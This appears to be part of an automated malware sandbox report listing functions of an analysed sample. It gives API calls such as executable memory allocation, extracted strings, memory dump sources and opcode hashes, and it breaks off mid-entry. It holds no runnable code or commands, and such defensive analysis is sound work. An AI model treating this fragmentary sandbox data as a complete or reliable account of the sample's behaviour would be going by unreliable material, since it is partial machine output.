Instruction Fuzzy Hash: B6416DB4501B009FC7A5CF2AD580906FBE1FF59714764C96ED49ACBB21E232E846CF50

Function 0074003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0074024D

Strings

cess, xrefs: 0074018D
kernel32.dll, xrefs: 0074008F, 00740095

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4e37773463db04960ea610d5de5676e08d2a9b3ebfc9bb26bbd888d8c2496cbd
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: A2527874A00229DFDB64CF68C984BA8BBB1BF09304F1480D9E90DAB251DB34AE94DF55

Function 0041DC90 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryPerformanceFrequency.KERNEL32(?), ref: 0041DC9F
QueryPerformanceCounter.KERNEL32 ref: 0041DCA8

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: 74f07bc8e50efd3519057b3f87de9a6e75b18443182d4a4607937466f5bea4e5
Instruction ID: cf934af31d7fd801202e8ff227d08505a2f211a9bf9b19b3174fe41f2db80190
Opcode Fuzzy Hash: 74f07bc8e50efd3519057b3f87de9a6e75b18443182d4a4607937466f5bea4e5
Instruction Fuzzy Hash: 73E0CD315102049BC200BB29EC09492375CBB051657400535F552C32E1FBB1E540C5DA

Function 00740E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00740223,?,?), ref: 00740E19
SetErrorMode.KERNELBASE(00000000,?,?,00740223,?,?), ref: 00740E1E

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0d95ee2dc00d02904126902d519ad7257b8297a6f4be405c0843031f0b165e47
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 03D0123114512877D7003A94DC09BCD7B1CDF05B62F008411FB0DD9080C774994046E5

Function 0041DD47 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 0041DD48
FindCloseChangeNotification.KERNELBASE ref: 0041DD51

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: Close$ChangeFindHandleNotification
String ID:
API String ID: 4069496961-0
Opcode ID: 33afc549a2946322197f0d6169b1bd1f91cb2271eb8d854534a53c047b64e1f3
Instruction ID: 735bb50e21341d307edbfc6ea54150e2bb7658fe125f9112808fd1fb34e0330b
Opcode Fuzzy Hash: 33afc549a2946322197f0d6169b1bd1f91cb2271eb8d854534a53c047b64e1f3
Instruction Fuzzy Hash: 71C012302002019FC3085F14DC1489536A8BB0610A3101028F807C3310EBB455418E9E

Function 0041DCEC Relevance: 2.5, APIs: 2, Instructions: 13
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0041DCEE
Sleep.KERNELBASE(00000008), ref: 0041DCF8

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: HandleSleep
String ID:
API String ID: 3856036018-0
Opcode ID: 36147958582a815a424119ad106e2ae3928bf73100ce20ac0ebcec693a5118d5
Instruction ID: 031e8577e70e1c34ed620d8c0ec15bf49d8c0ba5422b1a27ca065a6535be3163
Opcode Fuzzy Hash: 36147958582a815a424119ad106e2ae3928bf73100ce20ac0ebcec693a5118d5
Instruction Fuzzy Hash: D7D0A9322082209FC2406F28FC065313368AB04AAAB400238E912CA3E1EDF02C80CA1A

Function 0045F6BB Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 0045F76E

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5547a7dd528854f4a8a3dc88809ca3cc39ad3ba7506f8b2f15501bea225777e9
Instruction ID: 5b0bce7743250d46e13188fa3640516f761fae4d7eac6146f4195ddeee7b5c51
Opcode Fuzzy Hash: 5547a7dd528854f4a8a3dc88809ca3cc39ad3ba7506f8b2f15501bea225777e9
Instruction Fuzzy Hash: 753142B5614B008FC328CF2AD590912F7F2FF9C214365896E959A8BB61D771F842CF94

Function 0045F799 Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 0045F84B

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 78fa553809b1a774a1e4a3fbbabc16a57e34b608305acc61b9e1634c299feb51
Instruction ID: 0033b98ccabf2c47d6217ef865788c631c9c69623f2b523899aebe4da35fd66c
Opcode Fuzzy Hash: 78fa553809b1a774a1e4a3fbbabc16a57e34b608305acc61b9e1634c299feb51
Instruction Fuzzy Hash: 9F311DB4610B008FD368CF2AD580812FBF2BF9C314765895E959A8BB25D731F846CF54

Function 0045C475 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0045C45E

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 23a647ea4c24c8e8ac8a6474a4b7cbd3e2fd8edce05488302bb4df1ef2920868
Instruction ID: 1961079682067ad02d7b1bcfef5ec9a834f4f12da6ed83e780aef0c81febb47a
Opcode Fuzzy Hash: 23a647ea4c24c8e8ac8a6474a4b7cbd3e2fd8edce05488302bb4df1ef2920868
Instruction Fuzzy Hash: 51D0C970659201EBE214872ADC96F72BBB9FF09364F600824A60BD72A0CA25A8518A5C

Function 0045C450 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0045C45E

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ea75076e925acdb66f7485fdf8958149bd7c200ebd2239edb226c4fddecfbc72
Instruction ID: 4e924df0958a70b45c54ad0fee9f1c70ec1168af517871ac39e7b42e1ee5d31c
Opcode Fuzzy Hash: ea75076e925acdb66f7485fdf8958149bd7c200ebd2239edb226c4fddecfbc72
Instruction Fuzzy Hash: 96C08C70668200AAD2048335DC92F32277CBF05215F100C34A20BD32A0C4149442861C

Function 0045C3E2 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0045C3EE

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b772f26dfa6a573bcf30e4ff11d05511d809b0f5fab9cbe4158248931d3f0f89
Instruction ID: 73a53e1190aa02d20efba3c94d792b2f32702e8077556ab6fe3d12055d860728
Opcode Fuzzy Hash: b772f26dfa6a573bcf30e4ff11d05511d809b0f5fab9cbe4158248931d3f0f89
Instruction Fuzzy Hash: 83B09230140000BFDE088B10DE28F283B25AB40300F20046CBA02880A0C6A15882EB08

Function 0041DD85 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0041DD8C

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a3234e73188c80faadf087acb61bd9a63f89c8e749caa94b1cbecb3fd2093ea6
Instruction ID: 58cae62d531ece1d5a29b3a0e5c17b01a4ea790d880448bdca26df038fadbbf3
Opcode Fuzzy Hash: a3234e73188c80faadf087acb61bd9a63f89c8e749caa94b1cbecb3fd2093ea6
Instruction Fuzzy Hash: 3490023014410056E1442B655A0A70925105700706F11021AF519649D2F9942040A91F

Function 0082ED15 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0082ED66

Memory Dump Source

Source File: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82e000_current[1].jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1072d202dc1a84d076606ad1535800b632ea3a178aa8c3f78b242edca26b0a7b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CA112B79A00208EFDB01DF98C985E98BBF5EF08350F1580A5F9489B362D371EA90DB94

Non-executed Functions

Function 00789252 Relevance: 20.0, Strings: 15, Instructions: 1275COMMON

Download Yara Rule

Strings

/3}, xrefs: 00789EFD
URa, xrefs: 00789CCF
/3l, xrefs: 0078A01A
/3a, xrefs: 007898CC
/3k, xrefs: 0078972B
/3l, xrefs: 00789420
3oJ^, xrefs: 00789CF5
/3g, xrefs: 00789BFE
/3z, xrefs: 00789588
/3c, xrefs: 00789A72
XcA, xrefs: 007898D1
$oJW, xrefs: 00789982
/3g, xrefs: 007897FC
?O&2, xrefs: 00789622
RUf, xrefs: 00789801

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: $oJW$/3a$/3c$/3g$/3g$/3k$/3l$/3l$/3z$/3}$3oJ^$?O&2$RUf$URa$XcA
API String ID: 0-211467355
Opcode ID: 5adb50ab2dc3852ba30a59764935cda8caa388cbc7d3c704af3a5103a024b7a5
Instruction ID: c3aaa8282f7dcf6805ccafe8e15da6b531a08dd49f57df409f6459a4df2893f7
Opcode Fuzzy Hash: 5adb50ab2dc3852ba30a59764935cda8caa388cbc7d3c704af3a5103a024b7a5
Instruction Fuzzy Hash: F5C2AFB4500B418FD728CF2AC190A12FBF1BF99314B648A5EC99A8BB52D775F846CF50

Function 00789257 Relevance: 13.3, Strings: 10, Instructions: 791COMMON

Download Yara Rule

Strings

/3k, xrefs: 0078972B
/3l, xrefs: 00789420
/3z, xrefs: 00789588
/3c, xrefs: 00789A72
XcA, xrefs: 007898D1
$oJW, xrefs: 00789982
/3g, xrefs: 007897FC
/3a, xrefs: 007898CC
?O&2, xrefs: 00789622
RUf, xrefs: 00789801

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: $oJW$/3a$/3c$/3g$/3k$/3l$/3z$?O&2$RUf$XcA
API String ID: 0-776617730
Opcode ID: bfb82bf7ac8f0513804183dce456bb13f6e024db0a633b463a9ee78bb512a2f8
Instruction ID: f983a61fd8be57a5cffc1c07a380e0deb4102012902e0c3440d430de4052022f
Opcode Fuzzy Hash: bfb82bf7ac8f0513804183dce456bb13f6e024db0a633b463a9ee78bb512a2f8
Instruction Fuzzy Hash: 8872BDB4500B418FC728CF2AC190A12FBF1BF99314B54896ED99A8BB62D735F846CF50

Function 007A3B57 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 166nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A3D3C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A3D73

Strings

4(H, xrefs: 007A3D4F
4(H, xrefs: 007A3D7B
3b, xrefs: 007A3C30, 007A3CE6

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: 4(H$4(H$3b
API String ID: 292159236-4218585748
Opcode ID: f32557969f636b451995bd4f00a9403dc554747c41616eacb4d1513b1d72005b
Instruction ID: 9aadbf713e1e3ac39e54838fb2c88184b2c9fd54a6aa12ce93d9aa196123e8d9
Opcode Fuzzy Hash: f32557969f636b451995bd4f00a9403dc554747c41616eacb4d1513b1d72005b
Instruction Fuzzy Hash: CF51D9311192D09FDB018F79AC606A63FF0975B351B1841BAECA8CB3E7C2B44589DB69

Function 007A4847 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 156nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A4A1C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A4A56

Strings

D(H, xrefs: 007A4A5E
4f1k2, xrefs: 007A48A7, 007A49D8
D(HD(H, xrefs: 007A4A2F

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: 4f1k2$D(H$D(HD(H
API String ID: 292159236-3187743262
Opcode ID: c52925b0b20ff1ca7ee69a9b364d99aa311698153aa615aa5f16f3c37efc01ba
Instruction ID: 237b7b16e7d86b140b9e4c2e9e802488bffeb4d6962887a1700582eb29cca7b7
Opcode Fuzzy Hash: c52925b0b20ff1ca7ee69a9b364d99aa311698153aa615aa5f16f3c37efc01ba
Instruction Fuzzy Hash: B851B9311192D0AFCB018F69AC506A73FF1A77B311B0841B9E5A98B3A3C2784589DB69

Function 00754627 Relevance: 8.8, Strings: 1, Instructions: 7564COMMON

Download Yara Rule

Strings

^SF3, xrefs: 0075AC33

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: ^SF3
API String ID: 0-2107621105
Opcode ID: 3dd3d6c14dbbc93d4e978498b247910b49474ebf61e9174bb1fa805cb42109be
Instruction ID: e1eb04072ebef59ffc95a2fc9de5795c2e4ee47c18a4d26d083e925cebdb6570
Opcode Fuzzy Hash: 3dd3d6c14dbbc93d4e978498b247910b49474ebf61e9174bb1fa805cb42109be
Instruction Fuzzy Hash: 06F33E501193D09EDB028BB57C611F23FF4962B21174915BFD4D18A2B3F9E84A8AE72F

Function 007556E7 Relevance: 8.3, Strings: 1, Instructions: 7079COMMON

Download Yara Rule

Strings

^SF3, xrefs: 0075AC33

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: ^SF3
API String ID: 0-2107621105
Opcode ID: 74686cc347a948ea4f4ff7813229001b96bdabc2741ace3cf8d499daa067f4d5
Instruction ID: 22820764c4c6511e220f44228a4054379d0b9da5639f2c3cc4766fa0a2a6a1b3
Opcode Fuzzy Hash: 74686cc347a948ea4f4ff7813229001b96bdabc2741ace3cf8d499daa067f4d5
Instruction Fuzzy Hash: A7E31E5011D2D19EDB028BB57C610F23FF4963B21174915BBD4D18A2B3F9E84A8AE72F

Function 00788DF9 Relevance: 8.0, Strings: 6, Instructions: 487COMMON

Download Yara Rule

Strings

2zO], xrefs: 0078A949
/3l, xrefs: 0078A66B
TQd, xrefs: 0078A931
/3h, xrefs: 0078A702
/3k, xrefs: 0078A92C
/3l, xrefs: 0078A554

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: /3h$/3k$/3l$/3l$2zO]$TQd
API String ID: 0-2813886746
Opcode ID: db3e88031900aa188b4a389e28c03ca8cfb9161a4d881e93201c9fe54b2c6f85
Instruction ID: 1dfcc60be6d80bdb72f6bdb79dff7861a3ad256e323812a3c84725a009d14241
Opcode Fuzzy Hash: db3e88031900aa188b4a389e28c03ca8cfb9161a4d881e93201c9fe54b2c6f85
Instruction Fuzzy Hash: 9D1207B5500B418FD325CF2AC480A52FBF2BF99310B148A5ED89A9BB55D375F806CFA1

Function 00743267 Relevance: 7.3, Strings: 5, Instructions: 1062COMMON

Download Yara Rule

Strings

~b3m, xrefs: 00743CC3
&Z, xrefs: 00743915
D,y>, xrefs: 0074340B
^v.r, xrefs: 00743CB2
c"|q, xrefs: 0074448B

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: &Z$D,y>$^v.r$c"|q$~b3m
API String ID: 0-1920173314
Opcode ID: ca717bada9fdd06148724404e39c939549894a1fc7b8c36da66da57e61a3deb1
Instruction ID: 068074be0e60c0126f29010fac5055ff3066379bc91bead3215d110915c34aaf
Opcode Fuzzy Hash: ca717bada9fdd06148724404e39c939549894a1fc7b8c36da66da57e61a3deb1
Instruction Fuzzy Hash: 9CB2E5B9A196218BE744CF5AED80402BBE2BBC971D315C676C81457338F7B06946CFCA

Function 00403000 Relevance: 7.3, Strings: 5, Instructions: 1062COMMON

Download Yara Rule

Strings

~b3m, xrefs: 00403A5C
&Z, xrefs: 004036AE
c"|q, xrefs: 00404224
^v.r, xrefs: 00403A4B
D,y>, xrefs: 004031A4

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: &Z$D,y>$^v.r$c"|q$~b3m
API String ID: 0-1920173314
Opcode ID: ca717bada9fdd06148724404e39c939549894a1fc7b8c36da66da57e61a3deb1
Instruction ID: 56de7d889e577d3c106ac352b5b412e436beb1c7e8b2ef9c5fdf7743f6e5718a
Opcode Fuzzy Hash: ca717bada9fdd06148724404e39c939549894a1fc7b8c36da66da57e61a3deb1
Instruction Fuzzy Hash: 1EB2E5B9A196218BE744CF5AED80402BBE2BBC971D315C676C81457338F7B06946CFCA

Function 007A3507 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A36FF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A3739

Strings

,(H, xrefs: 007A369D
,(H, xrefs: 007A3712

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ,(H$,(H
API String ID: 292159236-760281248
Opcode ID: 7e380d9c7ab668ea0f064fe5083e69440d12894a4d49e54f2a260eb47601517f
Instruction ID: b53fd7aa75c493ba24521942e571520f9caf2a2d74c80041ac517ff213e2bb42
Opcode Fuzzy Hash: 7e380d9c7ab668ea0f064fe5083e69440d12894a4d49e54f2a260eb47601517f
Instruction Fuzzy Hash: F961B9711052D09FDB01CF79AC506B53FF1AB5B310B18417AECA89B3A2C235968EDB69

Function 007A2E57 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 172nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,$(H,00003000,00000040), ref: 007A304B
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A308C

Strings

$(H, xrefs: 007A3035, 007A3045
$, xrefs: 007A3026

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: $$$(H
API String ID: 292159236-3341668228
Opcode ID: cba6e359a16e7b045ebd60810ad1da4e787e79a562e64b2fece8b7bb89ac6dcc
Instruction ID: eb3b9bf894567884acd6f15c594049983f07803a85c9501d836616e7ba29014d
Opcode Fuzzy Hash: cba6e359a16e7b045ebd60810ad1da4e787e79a562e64b2fece8b7bb89ac6dcc
Instruction Fuzzy Hash: CC61B9395052D09FCB01CF789C507A63FF0AB1A310F1441FAE8989B3E3D276958ADB69

Function 007A4207 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A43EF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A4429

Strings

<(H, xrefs: 007A438D
<(H, xrefs: 007A4402

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: <(H$<(H
API String ID: 292159236-1453901598
Opcode ID: 3d9633cb5ac632bfc14321d0093dd66aacdba8b996a3f6ec3bff945cc9445a71
Instruction ID: f5d4c410667fd2152be6af6c7ef6d3087f6ffb197f2186768d4762126eafd051
Opcode Fuzzy Hash: 3d9633cb5ac632bfc14321d0093dd66aacdba8b996a3f6ec3bff945cc9445a71
Instruction Fuzzy Hash: 9551A8301042D09FCB11DF789C506A73FF4AB7B314F44417AE898AB3A2C275A58EDB69

Function 007A4A67 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A4C5C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A4C97

Strings

H(HH(H, xrefs: 007A4C6F
H(H, xrefs: 007A4C9F

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: H(H$H(HH(H
API String ID: 292159236-2173561896
Opcode ID: 783ce51b1cb5306673c148240400eb998ad4793599f9fbeb7a93a4c367bdfa7f
Instruction ID: 330627591662337e50ece0829de327956bb14efaf4e7aceecc753568996fdc3a
Opcode Fuzzy Hash: 783ce51b1cb5306673c148240400eb998ad4793599f9fbeb7a93a4c367bdfa7f
Instruction Fuzzy Hash: ED51CB71105291AFCB018F78FC505A63FF0D76B325B184679E8A88B3E3C2646789D769

Function 007A0CF7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A0EE8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A0F1D

Strings

#H, xrefs: 007A0E88
#H, xrefs: 007A0F01

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: #H$#H
API String ID: 292159236-1627510074
Opcode ID: 3e57522c6236cb9eb8d2c73fc35ca49fe59ff0836f2554eec90ba2db64fd4e8a
Instruction ID: 51a7e9dcde4cc1a041e0b0dec2035345845fedb5a5585a1c9ab205e1626a3081
Opcode Fuzzy Hash: 3e57522c6236cb9eb8d2c73fc35ca49fe59ff0836f2554eec90ba2db64fd4e8a
Instruction Fuzzy Hash: 4061C8305142D0EFC711CF78AC906A63FF1AB5A314F18596AE898DB2E3C23495C6DB69

Function 007A3757 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 007A393F
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 007A397A

Strings

0(H, xrefs: 007A3952
0(H, xrefs: 007A38DD

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: 0(H$0(H
API String ID: 292159236-2551337998
Opcode ID: d8e181ad21079036ba357d8be953007d7cfd4e38ce0c06618fc99d968e2e398a
Instruction ID: 874f4c9144c536f3ea7a0225f698899563e86e19dc9aec5fcd88d42ab76ad2e9
Opcode Fuzzy Hash: d8e181ad21079036ba357d8be953007d7cfd4e38ce0c06618fc99d968e2e398a
Instruction Fuzzy Hash: 9561B6701052909FCB11CF79AC516A63FF4A75A314B14427AFCEC8B7A2C2389689DB79

Function 007913A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162nativememoryCOMMON

Download Yara Rule

APIs

